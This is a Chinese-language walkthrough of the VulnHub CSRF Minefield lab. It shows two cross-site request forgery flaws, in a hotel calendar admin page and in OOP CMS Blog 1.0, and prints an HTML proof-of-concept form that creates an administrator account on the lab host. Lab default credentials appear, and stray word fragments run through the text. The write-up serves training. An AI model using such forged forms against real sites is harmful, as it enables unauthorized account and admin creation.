靶場下載連接 https://www.vulnhub.com/entry/csrf-minefield-1,316/php
兩處漏洞html
第一處:訪問http://192.168.110.208/hotelcal/admin/add_account.php
原始密碼 admin . admin
1.首先訪問網站點擊建立一個新用戶ide
2.建立完帳戶以後使用bp攔截抓去數據包oop
3.發現沒有使用Cookie token,將其數據包發送給burpsuite插件CSRF POC(burpsuite裏可下載)可自行改密碼帳號,以下:post
4.將生產的POC保存爲csrfpoc.htm 或者直接複製地址進行訪問,就成功建立用戶網站
第二處:
訪問http://192.168.110.208/oop/admin/addUser.php
原始密碼admin . 123ui
首先我是在https://www.exploit-db.com/裏面搜的OOP CMS Blog 1.0發現有一個是建立管理員,如今進行實現:
1.我先把上面的poc給下載下來 以後把他的ip、路徑改爲我本身的,最後生成一個html文件。插件
# POC: # 2) # http://192.168.110.208/oop/admin/addUser.php # <html> <body> <form action="http://192.168.110.208/oop/admin/addUser.php" method="post" enctype="multipart/form-data"> <table class="form"> <tbody><tr> <td> <label>User Name</label> </td> <td> <input name="userName" placeholder="Enter User Name..." type="text"> </td> </tr> <tr> <td> <label>Full Name</label> </td> <td> <input name="name" placeholder="Enter User Full Name..." type="text"> </td> </tr> <tr> <td> <label>User Password</label> </td> <td> <input name="password" placeholder="Enter User Password..." type="text"> </td> </tr> <tr> <td> <label>Email</label> </td> <td> <input name="email" placeholder="Enter User Email..." type="text"> </td> </tr> <tr> <td> <label>Details</label> </td> <td> <textarea name="details"></textarea> </td> </tr> <tr> <td> <label>User Roll</label> </td> <td> <select id="select" name="role"> <option>Select User Role</option> <option value="0">Admin</option> <option value="1">Author</option> <option value="2">Editor</option> </select> </td> </tr> <tr> <td></td> <td> <input name="submit" value="Create" type="submit"> </td> </tr> </tbody> </table> </form> </body> </html>
2.點擊生成的文件,如圖:
3.進行輸入用戶,密碼、選擇管理員以後點擊提交,他會自動跳轉到建立用戶的頁面,發現他提示建立成功code